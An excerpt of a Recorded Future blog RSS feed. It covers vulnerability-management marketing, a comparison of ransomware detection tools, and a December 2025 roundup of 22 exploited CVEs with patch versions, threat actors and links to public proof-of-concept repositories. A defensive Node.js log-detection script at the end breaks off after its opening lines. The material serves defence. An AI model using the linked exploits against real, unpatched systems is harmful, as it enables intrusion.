        <p>Future-ready security programs are intelligence-led, automation-enabled, and attacker-aware. Recorded Future sits at the center of this shift, providing the intelligence backbone required to move from reactive patching to proactive risk reduction.</p>
        <p>Explore how Recorded Future Vulnerability Intelligence and Attack Surface Intelligence can help your organization transition from alert-driven vulnerability management to intelligence-driven risk reduction.</p>
        <p>By unifying threat intelligence, vulnerability data, and attack surface visibility, organizations can reduce alert fatigue, prioritize what truly matters, and proactively harden defenses against real-world threats before attackers exploit them.</p>
        <div>
          <div>
            <div>
              <h2>Frequently Asked Questions</h2>
            </div>
          </div>
          <div>
            <div>
              <h3>What is the primary difference between a Vulnerability and a Threat?</h3>
              <p>A Vulnerability is a weakness or flaw in an asset (e.g., unpatched software, misconfiguration) that could be exploited. A Threat is a person, group, or event (e.g., a threat actor, a piece of malware) that has the potential to exploit that vulnerability to cause harm.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>What is the biggest challenge facing traditional vulnerability management programs today?</h3>
              <p>The biggest challenge is alert fatigue and prioritization noise. Traditional programs generate an overwhelming number of vulnerabilities, often relying only on the technical severity score (like CVSS). This leads security teams to waste time patching low-risk flaws while critical, actively exploited vulnerabilities remain unaddressed.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>Why is integrating external threat intelligence mandatory for TVM in 2026?</h3>
              <p>External threat intelligence provides real-time context on the threat landscape. These days, it’s mandatory because it allows security teams to identify which vulnerabilities are being actively exploited in the wild, have associated proof-of-concept (PoC) code, or are being discussed on the dark web, enabling true risk-based prioritization.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>How does Recorded Future Vulnerability Intelligence help with prioritization?</h3>
              <p>Recorded Future Vulnerability Intelligence automatically assigns a dynamic Risk Score to every CVE by correlating it with real-time threat intelligence from across the internet, including evidence of active exploitation, malware associations, and dark web chatter. This lets teams instantly know if a vulnerability is a theoretical risk or an immediate, active threat requiring urgent attention.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>What is Attack Surface Intelligence, and what role does it play in TVM?</h3>
              <p>Attack Surface Intelligence is the continuous process of identifying and monitoring all external-facing assets of an organization (like public IPs, domains, and cloud services). In TVM, it is crucial to ensure that vulnerabilities are not just identified on known assets, but also on shadow IT and unknown exposed systems that are most likely to be targeted by adversaries.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>How does the TVM lifecycle differ from the traditional vulnerability management lifecycle?</h3>
              <p>While both involve Discovery, Assessment, and Remediation, the TVM lifecycle adds an explicit Threat Analysis step before prioritization. The modern TVM cycle is typically:</p>
              <ul>
                <li>Identify Assets</li>
                <li>Scan for Vulnerabilities</li>
                <li>Enrich with Threat Context</li>
              </ul>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_1db30163db7f6aa5dca641559f3f07e312ffaeda4.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Best Ransomware Detection Tools]]></title>
            <link>https://www.recordedfuture.com/ko/blog/best-ransomware-detection-tools</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/best-ransomware-detection-tools</guid>
            <pubDate>Tue, 13 Jan 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Stop ransomware before encryption begins. Learn how intelligence-driven detection tools can help identify precursor behaviors and reduce false positives for faster response.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li>Effective ransomware detection requires three complementary layers: endpoint and extended detection and response (EDR/XDR) to monitor device-level activity, network detection and response (NDR) to catch lateral movement, and threat intelligence tools to provide context that enables efficient prioritization.</li>
          <li>The most valuable detection happens before ransomware encryption begins. Tools must identify precursor behaviors like reconnaissance, credential theft, and data staging rather than waiting for known indicators of compromise.</li>
          <li>Intelligence quality determines detection quality: even sophisticated security tools require real-time threat data about active ransomware campaigns, attacker infrastructure, and current tactics, techniques, and procedures (TTPs) to distinguish genuine threats from noise.</li>
          <li>Recorded Future strengthens the entire detection stack by providing organization-specific threat intelligence, early detection capabilities (in some cases, identifying victims up to 30 days before public extortion), and vulnerability intelligence focused on what ransomware groups are actively exploiting.</li>
        </ul>
        <h2>Introduction</h2>
        <p>The ransomware playbook has fundamentally changed. Instead of casting wide nets with opportunistic phishing campaigns, attackers now focus on big-game hunting: targeting high-value enterprises with data theft and double or triple extortion tactics. Threat actors purchase pre-compromised access from brokers, exploit newly disclosed vulnerabilities within hours, and use automation to compress weeks-long campaigns into days.</p>
        <p>The results are stark. Ransomware now appears in 44% of breaches, up from 32% the prior year, according to the <a href="https://www.verizon.com/business/resources/Ta64/reports/2025-dbir-data-breach-investigations-report.pdf">2025 Verizon Data Breach Investigations Report</a>. Traditional signature-based detection tools often can't keep pace because ransomware groups continuously rotate their infrastructure, modify malware variants, and adopt new tactics faster than defenses can update. By the time a signature is written, the threat has already evolved.</p>
        <p>This gap has created demand for a different approach: intelligence-driven ransomware detection. Rather than waiting for known indicators of compromise, these tools identify the precursor behaviors that happen before encryption (e.g., reconnaissance, credential theft, lateral movement, privilege escalation, and data staging).</p>
        <p>The key is continuous external intelligence that maps what's happening in your environment to active campaigns and specific ransomware families operating in the wild.</p>
        <p>The most effective defense combines three layers: endpoint and extended detection and response (EDR/XDR) to catch suspicious behaviors on devices, network detection and response (NDR) with deception technology to spot lateral movement, and threat intelligence tools that provide the real-time context tying it all together. When these tools share a common intelligence foundation, they can reveal malicious intent well before encryption begins.</p>
        <h2>The Ransomware Detection Tool Landscape: Three Pillars of Defense</h2>
        <p>Effective ransomware detection generally requires three complementary tool categories, each targeting different stages of an attack.</p>
        <h3>1. Endpoint and Extended Detection and Response (EDR/XDR) Tools</h3>
        <p>EDR and XDR platforms form the first line of defense, monitoring individual devices and user activity for signs of compromise.</p>
        <p><strong>Core Functionality</strong></p>
        <p>EDR and XDR solutions monitor endpoints for suspicious behaviors like privilege escalation, credential dumping, unusual process creation, and bulk file modifications. When they detect threats, these tools automatically isolate devices, roll back changes, and contain threats, cutting response time from hours to seconds.</p>
        <p><strong>How Threat Intelligence Enhances EDR/XDR</strong></p>
        <p>Threat intelligence connects endpoint activity to active campaigns in the wild. When an EDR tool flags suspicious activity, intelligence context reveals whether it matches known campaigns from groups like LockBit, ALPHV/BlackCat, or BlackBasta. This can dramatically reduce false positives by distinguishing unusual-but-legitimate administrative work from activity aligned with active ransomware operations.</p>
        <p><strong>Example Tools</strong></p>
        <ul>
          <li><strong>CrowdStrike Falcon</strong> delivers strong behavioral detection capabilities tied to comprehensive actor profiling. The platform's threat graph continuously correlates endpoint telemetry with global threat intelligence, enabling rapid identification of ransomware precursors.</li>
          <li><strong>Microsoft Defender XDR</strong> integrates telemetry across identity systems, endpoints, email, and cloud applications. This unified visibility helps security teams identify cross-domain attack patterns that indicate ransomware preparation, such as credential theft followed by lateral movement.</li>
          <li><strong>SentinelOne</strong> employs behavioral AI to detect malicious activity and offers automated rollback features that can reverse ransomware encryption and file modifications, effectively restoring systems to their pre-attack state.</li>
        </ul>
        <h3>2. Network Detection and Response (NDR) Tools</h3>
        <p>While EDR focuses on individual endpoints, NDR tools monitor the network layer to catch attackers as they move between systems.</p>
        <p><strong>Core Functionality</strong></p>
        <p>NDR platforms watch internal network traffic to catch attackers moving laterally, scanning for targets, or accessing resources they shouldn't. The more advanced versions include deception technology like honeypots, fake credentials, and decoy systems that look like attractive targets. When attackers interact with these decoys during reconnaissance, security teams get early warnings before any real damage occurs.</p>
        <p><strong>How Threat Intelligence Improves NDR and Deception</strong></p>
        <p>Threat intelligence helps organizations customize deception environments based on active ransomware groups in their industry. When NDR tools spot anomalies such as unusual file sharing, unexpected queries, or abnormal transfers, intelligence matches these to current attack techniques, distinguishing administrative work from reconnaissance patterns before data staging begins.</p>
        <p><strong>Example Tools</strong></p>
        <ul>
          <li><strong>Vectra AI</strong> specializes in detecting lateral movement and privilege misuse by correlating network behaviors with active attacker tradecraft. The platform's AI-driven detection identifies subtle deviations from normal network patterns that indicate ransomware reconnaissance.</li>
          <li><strong>ExtraHop Reveal(x)</strong> provides real-time network visibility that identifies reconnaissance activity and command-and-control (C2) communications. The platform's deep packet inspection capabilities reveal malicious traffic even when encrypted or obfuscated.</li>
          <li><strong>Illusive (now part of Zscaler)</strong> deploys deception technology specifically tuned to adversary behaviors. The platform's decoys and fake credentials create a minefield for attackers, triggering high-confidence alerts when threat actors interact with deception assets.</li>
        </ul>
        <h3>3. Threat Intelligence Tools</h3>
        <p>The third pillar provides the context that makes endpoint and network detection tools more accurate and actionable.</p>
        <p><strong>Core Functionality</strong></p>
        <p>Threat intelligence tools pull together global threat data from sources like dark web forums, malware repositories, scanning activity, and criminal infrastructure. They enrich alerts from your other security tools with context about who's behind an attack, which campaign it's part of, and what techniques the attackers are likely to use next.</p>
        <p><strong>How Threat Intelligence Strengthens Ransomware Detection</strong></p>
        <p>These tools deliver several critical capabilities that transform how security teams identify and respond to ransomware threats:</p>
        <ul>
          <li><strong>Threat Mapping:</strong> Identifies whether your organization matches the targeting profile of active ransomware groups based on your industry, size, region, and technology stack. Specific operators are mapped by their TTPs to assess both their intent and their opportunity to carry out a successful attack against your business.</li>
          <li><strong>Infrastructure Tracking:</strong> Monitors ransomware operators' continuous infrastructure shifts in real time, identifying new C2 servers, drop sites, and payment infrastructure as they emerge.</li>
          <li><strong>Variant Identification:</strong> Rapidly analyzes and disseminates indicators when ransomware groups release new malware variants, enabling detection before signature-based systems receive updates.</li>
          <li><strong>Exploitation Intelligence:</strong> Identifies specific CVEs and misconfigurations that attackers are actively weaponizing, moving vulnerability management from severity-score-driven to threat-driven prioritization.</li>
          <li><strong>Risk Scoring:</strong> Provides real-time scores combining multiple intelligence signals—indicator prevalence, campaign association, TTP alignment—to guide analysts toward genuine threats rather than generic suspicious activity.</li>
        </ul>
        <p><strong>Example Tools</strong></p>
        <ul>
          <li><strong>Recorded Future</strong> delivers organization-specific threat intelligence powered by The Intelligence Graph and proprietary AI. The platform provides end-to-end visibility into exposures, while research from its Insikt Group enables early detection of ransomware activity, identifying potential victims up to 30 days before public extortion.</li>
          <li><strong>Flashpoint</strong> specializes in deep and dark web intelligence, monitoring criminal forums, marketplaces, and chat channels where ransomware operators communicate, recruit, and trade access. This visibility into adversary communities provides early warnings about emerging threats and campaigns.</li>
          <li><strong>Google Threat Intelligence (formerly Mandiant)</strong> combines frontline incident response insights with global threat tracking. The platform leverages intelligence from breach investigations to identify ransomware group behaviors and attack patterns as they emerge.</li>
        </ul>
        <h2>Choosing the Right Ransomware Detection Tools</h2>
        <p>Security leaders must distinguish between tools that reduce ransomware risk and those that add noise. The most effective tools share several characteristics.</p>
        <p><strong>Security leaders should prioritize:</strong></p>
        <ul>
          <li><strong>Pre-encryption visibility:</strong> Detect credential misuse, suspicious access, and lateral movement during reconnaissance and preparation phases when interventions are most effective.</li>
          <li><strong>Context-rich alerts:</strong> Alerts should include TTPs, infrastructure associations, and known actor activity and explain not just what triggered an alert but why it matters.</li>
          <li><strong>Integration maturity:</strong> Smooth data flow into SIEM, SOAR, and existing investigation workflows without creating siloed intelligence or blind spots.</li>
          <li><strong>Operational efficiency:</strong> Tools should reduce alert noise, not add to it, decreasing time-to-detection and time-to-response.</li>
          <li><strong>Relevance:</strong> Intelligence must map to current campaigns. Generic or stale indicators waste analyst time and create false confidence.</li>
          <li><strong>Scalability:</strong> Handle hybrid environments spanning on-premises infrastructure, multiple cloud providers, and remote endpoints without performance degradation.</li>
        </ul>
        <h2>How Recorded Future Enables Early Ransomware Detection</h2>
        <p>The quality of threat intelligence directly determines detection effectiveness. Even sophisticated endpoint and network tools require high-fidelity, current threat data to generate value. Security teams have plenty of options for tools; the real challenge is addressing <a href="https://www.recordedfuture.com/ko/blog/reduce-alert-fatigue">alert fatigue</a>, which drains analyst time on false positives instead of credible threats.</p>
        <p>Recorded Future functions as the continuous intelligence layer strengthening the entire detection stack. Rather than adding another alert-generating tool, it feeds existing security ecosystems with real-time context about ransomware operator behavior.</p>
        <h3>Real-Time Relevance Through <a href="https://www.recordedfuture.com/ko/products/secops-intelligence">SecOps Intelligence</a></h3>
        <p>Every alert that hits your SIEM or endpoint platform gets automatically enriched with real-time risk scores, associated malware and infrastructure, and links to known attacker techniques and campaigns. Security tools can immediately recognize whether an indicator matches an active ransomware operation, cutting triage time from hours to minutes.</p>
        <h3>Proactive Mitigation Through Vulnerability Intelligence</h3>
        <p>Recorded Future identifies which vulnerabilities ransomware groups are actually exploiting right now, not just which ones have the highest theoretical severity ratings. This distinction matters because most high-severity vulnerabilities never get exploited in the wild, while some medium-severity vulnerabilities become critical the moment ransomware operators weaponize them.</p>
        <p>The platform shows you which vulnerabilities specific ransomware groups are targeting, where exploit code is available, and which vulnerabilities are generating buzz in criminal forums. This lets security teams prioritize patching based on what attackers are actually doing, focusing on the access vectors most likely to result in ransomware incidents.</p>
        <h3>Victimology and Anticipation</h3>
        <p>Intelligence about dark web chatter, leak site activity, and victimology patterns reveals which industries, geographies, and technologies are being targeted. When Recorded Future detects increased targeting of specific sectors, SOC analysts can anticipate attack paths, tighten access controls, and implement protective measures before campaigns reach their network.</p>
        <p>This closes the gap between reconnaissance and encryption. Most traditional tools don't trigger alerts until ransomware starts encrypting systems, by which point attackers have already stolen data. Intelligence-driven detection can catch the reconnaissance, credential theft, and lateral movement phases that happen first, shifting your response window from reactive damage control to proactive early containment.</p>
        <h2>Shifting From Reactive Response to Intelligence-Led Prevention</h2>
        <p>No single tool stops ransomware. The strongest defense is an integrated ecosystem where endpoint detection, network monitoring, and threat analysis platforms work from the same intelligence foundation.</p>
        <p>Intelligence elevates these tools from reactive detection to early recognition of adversary behavior during preparation and reconnaissance phases, enabling intervention before ransomware reaches its destructive phase. Organizations that build detection architecture on real-time threat intelligence will adapt as quickly as their adversaries, maintaining effective defenses as the threat landscape evolves.</p>
        <div>
          <div>
            <div>
              <h2>Frequently Asked Questions</h2>
            </div>
          </div>
          <div>
            <div>
              <h3>Can behavioral analytics alone stop zero-day ransomware variants?</h3>
              <p>While powerful, behavioral analytics alone cannot guarantee a stop to a true zero-day ransomware variant. It excels at detecting malicious behavior (like mass file encryption or privilege escalation), even from unknown malware. The most effective defense is a combination of behavioral analytics, up-to-the-minute threat intelligence on emerging TTPs, and controlled execution (sandboxing).</p>
            </div>
          </div>
          <div>
            <div>
              <h3>What is the most common weakness of signature-based ransomware detection methods today?</h3>
              <p>The primary weakness is their reactive nature. Signature-based tools only detect known threats—they require a threat to be analyzed and its signature created before they can flag it. They are easily bypassed by polymorphic ransomware or customized, novel variants that threat actors create to evade detection.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>How can Recorded Future's SecOps Intelligence Module help my existing EDR/XDR tool detect ransomware faster?</h3>
              <p>Recorded Future's SecOps Intelligence Module ingests and correlates massive amounts of external threat data. It directly integrates with your existing EDR/XDR tools, enriching alerts with real-time context (Risk Scores, actor TTPs, associated malware). This helps your existing tools move beyond basic indicators, prioritize critical alerts, and automatically initiate responses before a potential ransomware event escalates.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>How does Recorded Future provide victimology data to anticipate ransomware attacks targeting my industry?</h3>
              <p>Recorded Future's <a href="https://www.recordedfuture.com/ko/products/threat-intelligence">Threat Intelligence Module</a> provides crucial victimology and actor insights. It monitors real-time chatter on the dark web and forums to identify specific ransomware groups, their infrastructure, and the industries or regions they are planning to target next. This allows you to prioritize defenses based on pre-attack relevance.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>Is a dedicated deception technology platform considered a primary ransomware detection tool?</h3>
              <p>Deception technology is not a primary prevention tool, but it is an extremely effective early detection tool. It places fake assets (honeypots, fake credentials) within the network. When an attacker, particularly ransomware moving laterally, interacts with a decoy, it immediately triggers a high-fidelity alert, providing security teams with crucial seconds to isolate the endpoint and stop the attack before encryption begins.</p>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_195c3ebf5f4567c5e03d5fb20c8916aafc7cfb0e3.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[December 2025 CVE Landscape: 22 Critical Vulnerabilities Mark 120% Surge, React2Shell Dominates Threat Activity]]></title>
            <link>https://www.recordedfuture.com/ko/blog/december-2025-cve-landscape</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/december-2025-cve-landscape</guid>
            <pubDate>Tue, 13 Jan 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[December 2025 saw a 120% surge in critical CVEs, with 22 exploited flaws and React2Shell (CVE-2025-55182) dominating threat activity across Meta’s React framework.]]></description>
            <content:encoded><![CDATA[
        <p>December 2025 witnessed a dramatic 120% increase in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying <strong>22 vulnerabilities</strong> requiring immediate remediation, up from 10 in November. The month was dominated by widespread exploitation of Meta's React Server Components flaw.</p>
        <p><strong>What security teams need to know:</strong></p>
        <ul>
          <li><strong>React2Shell pandemonium:</strong> CVE-2025-55182 triggered a global exploitation wave with multiple threat actors deploying diverse malware families</li>
          <li><strong>China-nexus exploitation intensifies:</strong> Earth Lamia, Jackpot Panda, and UAT-9686 leveraged critical flaws for espionage operations</li>
          <li><strong>Public exploits proliferate:</strong> Eleven of 22 vulnerabilities have proof-of-concept code available, accelerating exploitation timelines</li>
          <li><strong>Legacy vulnerabilities resurface:</strong> CISA added 2018-2022 era flaws to its Known Exploited Vulnerabilities (KEV) catalog, highlighting persistent patch gaps</li>
        </ul>
        <p><strong>Bottom line:</strong> December's surge reflects both new zero-days and renewed interest in legacy vulnerabilities. React2Shell alone demonstrates how quickly modern web frameworks can become global attack vectors.</p>
        <h2>Quick Reference Table</h2>
        <p><em>All 22 vulnerabilities below were actively exploited in December 2025.</em></p>
        <div>
          <div>
            <div><strong>#</strong></div>
            <div><strong>Vulnerability</strong></div>
            <div><strong>Risk</strong><br /><strong>Score</strong></div>
            <div><strong>Affected Vendor/Product</strong></div>
            <div><strong>Vulnerability Type/Component</strong></div>
            <div><strong>Public PoC</strong></div>
          </div>
          <div>
            <div>1</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BBMtKwC/overview">CVE-2025-55182</a></div>
            <div>99</div>
            <div>Meta React Server Components</div>
            <div>CWE-502 (Deserialization of Untrusted Data)</div>
            <div><a href="https://github.com/search?q=CVE-2025-55182&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>2</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BBRk_r0/overview">CVE-2025-66644</a></div>
            <div>99</div>
            <div>Array Networks ArrayOS AG</div>
            <div>CWE-78 (OS Command Injection)</div>
            <div>No</div>
          </div>
          <div>
            <div>3</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/6U4U81/overview">CVE-2025-48572</a></div>
            <div>99</div>
            <div>Google Android</div>
            <div>CWE-306 (Missing Authentication for Critical Function)</div>
            <div>No</div>
          </div>
          <div>
            <div>4</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/6U4lfv/overview">CVE-2025-48633</a></div>
            <div>99</div>
            <div>Google Android</div>
            <div>Insufficient Information</div>
            <div>No</div>
          </div>
          <div>
            <div>5</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BBaz1-z/overview">CVE-2025-59718</a></div>
            <div>99</div>
            <div>Fortinet Multiple Products</div>
            <div>CWE-347 (Improper Verification of Cryptographic Signature)</div>
            <div><a href="https://github.com/search?q=CVE-2025-59718&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>6</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BBa2HBm/overview">CVE-2025-59719</a></div>
            <div>99</div>
            <div>Fortinet FortiWeb</div>
            <div>CWE-347 (Improper Verification of Cryptographic Signature)</div>
            <div><a href="https://github.com/moften/CVE-2025-59718-Fortinet-Poc">Yes</a></div>
          </div>
          <div>
            <div>7</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BBaZM-R/overview">CVE-2025-62221</a></div>
            <div>99</div>
            <div>Microsoft Windows</div>
            <div>CWE-416 (Use After Free)</div>
            <div>No</div>
          </div>
          <div>
            <div>8</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BBMhTQJ/overview">CVE-2025-8110</a></div>
            <div>99</div>
            <div>Gogs</div>
            <div>CWE-22 (Path Traversal)</div>
            <div><a href="https://github.com/search?q=CVE-2025-8110&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>9</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BBgciBg/overview">CVE-2025-14174</a></div>
            <div>99</div>
            <div>Google Chromium</div>
            <div>CWE-787 (Out-of-bounds Write)</div>
            <div><a href="https://github.com/zeroxjf/CVE-2025-14174-analysis">Yes</a></div>
          </div>
          <div>
            <div>10</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BBhnuhP/overview">CVE-2025-14611</a></div>
            <div>99</div>
            <div>Gladinet CentreStack and Triofox</div>
            <div>CWE-798 (Use of Hard-coded Credentials)</div>
            <div><a href="https://github.com/pl4tyz/CVE-2025-14611-CentreStack-and-Triofox-full-Poc-Exploit">Yes</a></div>
          </div>
          <div>
            <div>11</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BBsdjtE/overview">CVE-2025-59374</a></div>
            <div>99</div>
            <div>ASUS Live Update</div>
            <div>CWE-506 (Embedded Malicious Code)</div>
            <div>No</div>
          </div>
          <div>
            <div>12</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BBtm5Fw/overview">CVE-2025-20393</a></div>
            <div>99</div>
            <div>Cisco Multiple Products</div>
            <div>CWE-20 (Improper Input Validation)</div>
            <div><a href="https://github.com/search?q=CVE-2025-20393&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>13</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/5R0AQ0/overview">CVE-2025-43529</a></div>
            <div>99</div>
            <div>Apple Multiple Products</div>
            <div>CWE-416 (Use After Free)</div>
            <div>No</div>
          </div>
          <div>
            <div>14</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/5RY_KG/overview">CVE-2025-40602</a></div>
            <div>99</div>
            <div>SonicWall SMA1000 appliance</div>
            <div>CWE-250 (Execution with Unnecessary Privileges)</div>
            <div>No</div>
          </div>
          <div>
            <div>15</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BBw5PCQ/overview">CVE-2025-14733</a></div>
            <div>99</div>
            <div>WatchGuard Firebox</div>
            <div>CWE-787 (Out-of-bounds Write)</div>
            <div>No</div>
          </div>
          <div>
            <div>16</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BBx5LcP/overview">CVE-2025-14847</a></div>
            <div>99</div>
            <div>MongoDB and MongoDB Server</div>
            <div>CWE-130 (Improper Handling of Length Parameter Inconsistency)</div>
            <div><a href="https://github.com/search?q=CVE-2025-14847&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>17</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/t9VBl0/overview">CVE-2023-52163</a></div>
            <div>99</div>
            <div>Digiever DS-2105 Pro</div>
            <div>CWE-862 (Missing Authorization)</div>
            <div>No</div>
          </div>
          <div>
            <div>18</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/Z2-Qcf/overview">CVE-2018-4063</a></div>
            <div>99</div>
            <div>Sierra Wireless AirLink ALEOS</div>
            <div>CWE-434 (Unrestricted Upload of File with Dangerous Type)</div>
            <div>No</div>
          </div>
          <div>
            <div>19</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BA5mEyi/overview">CVE-2025-58360</a></div>
            <div>99</div>
            <div>OSGeo GeoServer</div>
            <div>CWE-611 (Improper Restriction of XML External Entity Reference)</div>
            <div><a href="https://github.com/search?q=CVE-2025-58360&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>20</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/7KUyzy/overview">CVE-2025-6218</a></div>
            <div>99</div>
            <div>RARLAB WinRAR</div>
            <div>CWE-22 (Path Traversal)</div>
            <div><a href="https://github.com/search?q=CVE-2025-6218&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>21</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/neGcOR/overview">CVE-2022-37055</a></div>
            <div>99</div>
            <div>D-Link Routers</div>
            <div>CWE-120 (Classic Buffer Overflow)</div>
            <div>No</div>
          </div>
          <div>
            <div>22</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/hzmZuu/overview">CVE-2021-26828</a></div>
            <div>99</div>
            <div>OpenPLC ScadaBR</div>
            <div>CWE-434 (Unrestricted Upload of File with Dangerous Type)</div>
            <div><a href="https://github.com/search?q=CVE-2021-26828&amp;type=repositories">Yes</a></div>
          </div>
        </div>
        <p><em><strong>Table 1:</strong></em> <em>List of vulnerabilities that were actively exploited in December based on Recorded Future data (Source: Recorded Future)</em></p>
        <h2>Key Trends in December 2025</h2>
        <h3>Affected Vendors</h3>
        <ul>
          <li><strong>Fortinet</strong> added two critical signature-verification flaws (CWE-347) that allow authentication bypass, continuing its run of exploited vulnerabilities</li>
          <li><strong>Google</strong> faced three vulnerabilities across Android (2) and Chromium (1) platforms</li>
          <li><strong>Microsoft</strong> dealt with a Windows kernel use-after-free vulnerability</li>
          <li><strong>Meta</strong> experienced the month's most impactful vulnerability with React2Shell</li>
          <li>Additional affected vendors: Array Networks, Gogs, Gladinet, ASUS, Cisco, Apple, SonicWall, WatchGuard, MongoDB, Digiever, Sierra Wireless, OSGeo, RARLAB, D-Link, and OpenPLC</li>
        </ul>
        <h3>Most Common Weakness Types</h3>
        <ul>
          <li><strong>CWE-22</strong> – Path Traversal</li>
          <li><strong>CWE-347</strong> – Improper Verification of Cryptographic Signature</li>
          <li><strong>CWE-416</strong> – Use After Free</li>
          <li><strong>CWE-434</strong> – Unrestricted Upload of File with Dangerous Type</li>
          <li><strong>CWE-787</strong> – Out-of-bounds Write</li>
        </ul>
        <h3>Threat Actor Activity</h3>
        <p><strong><a href="https://www.recordedfuture.com/ko/blog/critical-react2shell-vulnerability">React2Shell exploitation</a></strong> <strong>dominated December’s CVE activity:</strong></p>
        <ul>
          <li><strong>Threat actors observed to have exploited this vulnerability:</strong>
            <ul>
              <li><strong>China-nexus actors</strong> Earth Lamia and Jackpot Panda</li>
              <li><strong>China-linked clusters</strong> UNC6600, UNC6586, UNC6588, UNC6603, and UNC6595</li>
              <li>North Korea-linked and financially motivated groups</li>
            </ul>
          </li>
          <li><strong>Observed payloads</strong> included EtherRAT, PeerBlight, CowTunnel, ZinFoq, Kaiji variants, Zndoor, RondoDox, MINOCAT, SNOWLIGHT, COMPOOD, HISONIC, ANGRYREBEL.LINUX, and Weaxor ransomware (using a Cobalt Strike stager)</li>
          <li><strong>Infrastructure connections</strong> to HiddenOrbit relay infrastructure and GobRAT relay component</li>
        </ul>
        <p><strong>Additional activity:</strong></p>
        <ul>
          <li><strong>UAT-9686</strong> exploited Cisco Secure Email Gateway (<strong>CVE-2025-20393</strong>), deploying AquaShell, AquaPurge, and AquaTunnel</li>
          <li><strong>Unknown actors</strong> leveraged Gogs vulnerability (<strong>CVE-2025-8110</strong>) for Supershell malware deployment</li>
        </ul>
        <h2>Priority Alert: Active Exploitation</h2>
        <p>These vulnerabilities demand immediate attention due to confirmed widespread exploitation.</p>
        <h3>CVE-2025-55182 | Meta React Server Components (React2Shell)</h3>
        <p><strong>Risk Score: 99 (Very Critical)</strong> | CISA KEV: Added December 5, 2025</p>
        <p><strong>Why this matters:</strong> Unauthenticated remote code execution through unsafe deserialization (CWE-502) of React Server Components payloads affects React and Next.js, two of the world's most widely deployed web frameworks. Multiple threat actors are actively exploiting vulnerable instances with diverse malware payloads.</p>
        <p><strong>Affected versions:</strong></p>
        <ul>
          <li>React packages: react-server-dom-webpack, react-server-dom-parcel, react-server-dom-turbopack (19.0.0, 19.1.0, 19.1.1, and 19.2.0)</li>
          <li>Next.js: 15.x, 16.x, and Canary builds from 14.3.0-canary.77</li>
          <li>Also affects: React Router, Waku, RedwoodSDK, Parcel, Vite RSC plugin</li>
        </ul>
        <p><strong>Immediate actions:</strong></p>
        <ul>
          <li>Upgrade React to 19.0.3, 19.1.4, or 19.2.3 immediately</li>
          <li>Update Next.js to 16.0.7, 15.5.7, 15.4.8, 15.3.6, 15.2.6, 15.1.9, or 15.0.5</li>
          <li>Monitor for unusual <code>multipart/form-data</code> POST requests consistent with Next.js Server Actions / RSC endpoints</li>
          <li>Check logs for <code>E{"digest"</code> error patterns indicating exploitation attempts</li>
          <li>Review server processes for unexpected Node.js child processes</li>
        </ul>
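        <p>As an added example (not Recorded Future's code, and not a detection the post ships), the Node.js script below applies the log-monitoring steps above to reverse-proxy logs: it flags <code>multipart/form-data</code> POSTs whose <code>Next-Action</code> header carries an action ID the deployed build never shipped, flags responses containing the <code>E{"digest"</code> error chunk, and groups hits per source so a burst from one address stands out from a single broken client. The JSON-lines log layout, the field names, the known-action-ID allow-list and the sample lines are all constructed assumptions; map them onto whatever your proxy actually emits.</p>

```javascript
// Added example (not Recorded Future's code): flag React2Shell-style probing in
// reverse-proxy logs. The JSON-lines layout and field names are assumptions made
// for this example; map them onto what your proxy actually emits.

// Assumption: Server Action IDs the deployed build actually ships (e.g. exported
// from the build's server-reference manifest). Any other ID is a probe signal.
const KNOWN_ACTION_IDS = new Set([
  '7f3a1c9e2b4d6f8a0c1e3b5d7f9a2c4e6b8d0f1a',
]);

// Prefix of an RSC error chunk, as named in the advisory text above.
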